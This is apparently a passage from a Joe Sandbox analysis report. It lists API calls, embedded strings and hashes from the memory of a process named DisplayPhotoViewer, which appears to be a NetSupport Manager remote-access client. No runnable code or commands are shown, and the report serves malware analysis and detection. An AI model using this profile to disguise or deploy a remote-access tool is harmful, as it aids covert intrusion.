                                                                                                      • Part of subcall function 11138730: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 111387E5
                                                                                                      • Part of subcall function 11138730: SetBkColor.GDI32(00000000,?), ref: 111387F0
                                                                                                      • Part of subcall function 11138730: SetTextColor.GDI32(00000000,00000000), ref: 111387F9
                                                                                                      • Part of subcall function 11138730: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11138816
                                                                                                      • Part of subcall function 11138730: SelectObject.GDI32(00000000,00000000), ref: 11138821
                                                                                                      • Part of subcall function 11107820: _malloc.LIBCMT ref: 11107829
                                                                                                      • Part of subcall function 11107820: _memset.LIBCMT ref: 11107852
                                                                                                    • _memset.LIBCMT ref: 11007AC7
                                                                                                    • _swscanf.LIBCMT ref: 11007B34
                                                                                                      • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007B65
                                                                                                    • _memset.LIBCMT ref: 11007B8C
                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007B9F
                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007BA6
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007BB3
                                                                                                    • GetWindowRect.USER32(?,?), ref: 11007CF6
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007D33
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 11007D53
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 11007D70
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007DC0
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007886
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004C), ref: 11090E7E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004D), ref: 11090E87
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004E), ref: 11090E8E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000000), ref: 11090E97
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004F), ref: 11090E9D
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000001), ref: 11090EA5
                                                                                                    • UpdateWindow.USER32(?), ref: 11007DF2
                                                                                                    • SetCursor.USER32(?), ref: 11007DFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2635354838-4093202882
                                                                                                    • Opcode ID: 2e50c44e1fa5e67d10b9592fcf3ff0d0bc7dda72930c32344f7f7c550c6657e7
                                                                                                    • Instruction ID: 08dc9fe3903b94fe4ff24ac761506ea9977523278d8d5343f9741b8a3b7c0153
                                                                                                    • Opcode Fuzzy Hash: 2e50c44e1fa5e67d10b9592fcf3ff0d0bc7dda72930c32344f7f7c550c6657e7
                                                                                                    • Instruction Fuzzy Hash: 2E228475A00719AFD760DF64CC89FDAF7B9BB48708F0085ADE65A97284EB70A940CF50
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,74DF2F30,?,?,1070226E,?,?,10702DEA,?,?,?,107022B6,?,?,10702DEA,00000000), ref: 10702420
                                                                                                    • GetTickCount.KERNEL32 ref: 10702473
                                                                                                    • GetTickCount.KERNEL32 ref: 1070249C
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 107024BA
                                                                                                    • TranslateMessage.USER32(?), ref: 107024C0
                                                                                                    • DispatchMessageA.USER32(?), ref: 107024C6
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 107024DE
                                                                                                    • wsprintfA.USER32 ref: 107024F7
                                                                                                    • wsprintfA.USER32 ref: 1070251E
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1070252A
                                                                                                    • wsprintfA.USER32 ref: 1070253D
                                                                                                    • OutputDebugStringA.KERNEL32(?), ref: 10702549
                                                                                                    • wsprintfA.USER32 ref: 10702575
                                                                                                    • wsprintfA.USER32 ref: 107025BA
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 107025CD
                                                                                                    • wsprintfA.USER32 ref: 10702658
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 1070275B
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 107027B4
                                                                                                    • GetVersionExA.KERNEL32 ref: 107027DA
                                                                                                    • wsprintfA.USER32 ref: 10702853
                                                                                                    • wsprintfA.USER32 ref: 1070292A
                                                                                                    • wsprintfA.USER32 ref: 10702A9C
                                                                                                    • SetTimer.USER32(00000000,00000000,00000000,10702BF0), ref: 10702AB8
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 10702ACF
                                                                                                    • KillTimer.USER32(00000000,00000000), ref: 10702AD8
                                                                                                    • PeekMessageA.USER32(?,00000000,00000012,00000012,00000001), ref: 10702AEA
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 10702B06
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$Message$CountCurrentThreadTickTimer$DebugDispatchErrorFileKillLastLocalModuleNameOutputPathPeekStringTempTimeTranslateVersion
                                                                                                    • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$%d.$, error code %u (x%x)$, thread=%s$, tid=%x$.err$.exe$21/01/14 12:07:00 V12.01$Assert failed - $Assert, tid=%x%s$File %hs, line %d%s%sBuild: %hs (%.17hs)Expression: %s$NOT copied to disk$Support\$Unhandled Exception (GPF)$Unhandled Exception (GPF) - $copied to %s
                                                                                                    • API String ID: 1966893409-1844804007
                                                                                                    • Opcode ID: 0f48e4375eb0324f7077f7be426236a81b1225d4b631880fcc95c967b8863504
                                                                                                    • Instruction ID: c52ce69b66e472707bdf106e5462cddb7a304d656c752e9accba523f28ea6f7c
                                                                                                    • Opcode Fuzzy Hash: 0f48e4375eb0324f7077f7be426236a81b1225d4b631880fcc95c967b8863504
                                                                                                    • Instruction Fuzzy Hash: 05121972A002189BDB54CB74CC85BEE77A9EB49310F104399F91AE72C4DFB4AE45CB94
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 1110B66A
                                                                                                    • GetTickCount.KERNEL32 ref: 1110B6DE
                                                                                                    • CreateRectRgn.GDI32(00000000,?,?,?), ref: 1110B702
                                                                                                    • GetClientRect.USER32(?,?), ref: 1110B7B2
                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 1110B8E4
                                                                                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 1110B93F
                                                                                                    • GetClipRgn.GDI32(?,00000000), ref: 1110B953
                                                                                                    • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 1110B978
                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 1110B983
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1110B991
                                                                                                    • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1110BA1B
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1110BA2A
                                                                                                    • DeleteObject.GDI32(?), ref: 1110BA34
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 1110BA72
                                                                                                    • GetWindowOrgEx.GDI32(?,?), ref: 1110BA87
                                                                                                    • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1110BACC
                                                                                                    • GetKeyState.USER32(000000A3), ref: 1110BAF7
                                                                                                    • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1110BB3B
                                                                                                    • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1110BB4D
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1110BB61
                                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 1110BB77
                                                                                                    • Sleep.KERNEL32(00000032), ref: 1110BB7F
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1110BB90
                                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 1110BBA3
                                                                                                    • Sleep.KERNEL32(00000032), ref: 1110BBAB
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1110BBBC
                                                                                                    • DeleteObject.GDI32(?), ref: 1110BBC6
                                                                                                    • DeleteObject.GDI32(?), ref: 1110BBD0
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 1110BBF5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 879653699-0
                                                                                                    • Opcode ID: ae3e1dcbd93d47543e7c3eaf08f32a26ed53f5eabfeff51ae37d1e2553353821
                                                                                                    • Instruction ID: 7984207307c20109081e5b6f2b62563caa98a0db5f7b3b4cfb8bc68f55d11ed3
                                                                                                    • Opcode Fuzzy Hash: ae3e1dcbd93d47543e7c3eaf08f32a26ed53f5eabfeff51ae37d1e2553353821
                                                                                                    • Instruction Fuzzy Hash: 0F120475A01B099FCB64CFA8D984BAEF7F5FB88305F10852EE55AA7244DB70A840CF14
                                                                                                    APIs
                                                                                                      • Part of subcall function 10701A40: GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 10701A6D
                                                                                                      • Part of subcall function 10701A40: wsprintfA.USER32 ref: 10701AA7
                                                                                                    • GetModuleHandleA.KERNEL32(NSMTRACE,10701A57), ref: 1070195A
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 10701975
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 10701982
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 1070198F
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 1070199C
                                                                                                    • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 107019A9
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 107019B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 107019C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 107019D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 107019DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 107019EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Module$FileHandleNamewsprintf
                                                                                                    • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                    • API String ID: 3686653098-3703587661
                                                                                                    • Opcode ID: 85c81bd3f1f53e7a069c9c13ea2767121e213c62303f2cb39922391e0f6fd8af
                                                                                                    • Instruction ID: 976e66a9952db34848015b0686b79f73aadc81c498bb77128f78c0849c122566
                                                                                                    • Opcode Fuzzy Hash: 85c81bd3f1f53e7a069c9c13ea2767121e213c62303f2cb39922391e0f6fd8af
                                                                                                    • Instruction Fuzzy Hash: 0901D2F19112787AC730AB755C49FC62AB9EB9D300F014616F400D7AA0D7B4D093DBA8
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
                                                                                                    • API String ID: 2102423945-3087083064
                                                                                                    • Opcode ID: 1c3e1aa8d2f666270324048d9e48de6a7157740e17a48a556423e7e1c1c2f1bc
                                                                                                    • Instruction ID: 74103a851687b1e317bd837d5c28fdb707630397fc2d11fd60b1a990bd3562c2
                                                                                                    • Opcode Fuzzy Hash: 1c3e1aa8d2f666270324048d9e48de6a7157740e17a48a556423e7e1c1c2f1bc
                                                                                                    • Instruction Fuzzy Hash: 9DA16B71E0025A6BDB22CF34CC91BEEBBFDAF86304F1441E9D95997240E631AE45CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 110D7BA0: EnterCriticalSection.KERNEL32(111E0C5C,11017238,218EC38C,?,?,?,111C0108,1117BDB8,000000FF,?,11019202), ref: 110D7BA1
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D16C3
                                                                                                      • Part of subcall function 11157E51: RaiseException.KERNEL32(?,?,111084C4,?,?,?,?,?,111084C4,?,111C0108), ref: 11157E93
                                                                                                      • Part of subcall function 110D1340: __CxxThrowException@8.LIBCMT ref: 110D13B2
                                                                                                      • Part of subcall function 110D1340: getpeername.WSOCK32(?,00000000,00000000,218EC38C), ref: 110D13D0
                                                                                                      • Part of subcall function 11010D50: _memmove.LIBCMT ref: 11010D8D
                                                                                                    • gethostbyname.WSOCK32(0.0.0.0,218EC38C,?,?,00000000), ref: 110D16D5
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117C00B), ref: 110D16E1
                                                                                                    • _memmove.LIBCMT ref: 110D170B
                                                                                                    • htons.WSOCK32(00000000), ref: 110D1731
                                                                                                    • socket.WSOCK32(00000002,00000001,00000000), ref: 110D1745
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D1753
                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00000004,?,00000004), ref: 110D1771
                                                                                                    • bind.WSOCK32(?,?,00000010), ref: 110D1781
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D178C
                                                                                                    • listen.WSOCK32(?,7FFFFFFF,218EC38C,?,?,00000000), ref: 110D17A8
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117C00B), ref: 110D17B3
                                                                                                    • accept.WSOCK32(?,00000000,00000000,000000FF), ref: 110D1816
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117C00B), ref: 110D1824
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(111E0BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111E0BD0,00000000,000000FF,218EC38C,?,00000000,00000000,?,?,?,00000000,1117D21B), ref: 110D9983
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(11192F38,?,?,?,00000000,1117D21B,000000FF,?,110D7033,?,Invalid Server paramters), ref: 110D998A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$DebugException@8OutputStringThrow_memmove$CriticalEnterExceptionRaiseSectionacceptbindgethostbynamegetpeernamehtonslistensocket
                                                                                                    • String ID: 0.0.0.0$Listen() the socket is not closed
                                                                                                    • API String ID: 1096978048-1307932746
                                                                                                    • Opcode ID: 054e26bb97aaf3827a4da9fb0d46d19f8d37a779fba190a9ed8566491c4b6db7
                                                                                                    • Instruction ID: 75fbb713bcc43a2d91c028340bf4bea3e3fbe913fe8f2b0e60ed69cb15474446
                                                                                                    • Opcode Fuzzy Hash: 054e26bb97aaf3827a4da9fb0d46d19f8d37a779fba190a9ed8566491c4b6db7
                                                                                                    • Instruction Fuzzy Hash: 9B6183B4E00706ABDF04DFB8C895B9EF7B9AF48728F104619E925D72C0DF70A5048BA1
                                                                                                    APIs
                                                                                                    • CapiHangup.PCICAPI ref: 1106BC4F
                                                                                                    • CapiClose.PCICAPI ref: 1106BC54
                                                                                                    • CapiOpen.PCICAPI(00000000,00000000), ref: 1106BC5D
                                                                                                    • CapiListen.PCICAPI(00000001,00000000,00000000,00000000), ref: 1106BC6B
                                                                                                    • GetTickCount.KERNEL32 ref: 1106BCFA
                                                                                                    • GetTickCount.KERNEL32 ref: 1106BD02
                                                                                                    • CapiHangup.PCICAPI ref: 1106BD8F
                                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,000018BF,10000000), ref: 1106BDB9
                                                                                                    • GetTickCount.KERNEL32 ref: 1106BDBF
                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1106BE05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Capi$CountTick$HangupSleep$CloseListenOpen
                                                                                                    • String ID: $DB$*MSN$..\ctl32\Connect.cpp$Dialup$tapi
                                                                                                    • API String ID: 1585182496-2734021829
                                                                                                    • Opcode ID: 7c770ee502089d41b6fa11009119e50a7c6c7abd7a69a083e89de3bcbba487bd
                                                                                                    • Instruction ID: 5c9455bb8696ab22761e7f9117eb05480bce2e52a827a06de5a724ae55753baa
                                                                                                    • Opcode Fuzzy Hash: 7c770ee502089d41b6fa11009119e50a7c6c7abd7a69a083e89de3bcbba487bd
                                                                                                    • Instruction Fuzzy Hash: 40C129B5F006099FEB60DB34DC91BADB3A4EF44318F1041B9E51D9B2C1EE71AA80CB91
                                                                                                    Strings
                                                                                                    • Received unexpected CAPI message, command=%x, plci=%d, ncci=%d, xrefs: 10703EFE
                                                                                                    • (dwChannelState [nChannel] & SENT_CONNECT_B3_REQ) == 0, xrefs: 10703A68
                                                                                                    • E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C, xrefs: 10703A63
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (dwChannelState [nChannel] & SENT_CONNECT_B3_REQ) == 0$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$Received unexpected CAPI message, command=%x, plci=%d, ncci=%d
                                                                                                    • API String ID: 0-1676465985
                                                                                                    • Opcode ID: e736f835606a803164302c29a5de0fbae49d28d1c3c8f7adb9776ded89a2018c
                                                                                                    • Instruction ID: 02ffce3df78f0e2866fe0c5eeefcdb23fc1e6f8c39231c515e8732e0ed09c3a5
                                                                                                    • Opcode Fuzzy Hash: e736f835606a803164302c29a5de0fbae49d28d1c3c8f7adb9776ded89a2018c
                                                                                                    • Instruction Fuzzy Hash: ED228F72A00154ABC710CF68EC817AEB7F8FF4A350F40C3A6E54AA7290DB715E45C755
                                                                                                    APIs
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • IsWindow.USER32(00000000), ref: 110C7AE3
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 110C7AF2
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 110C7B0A
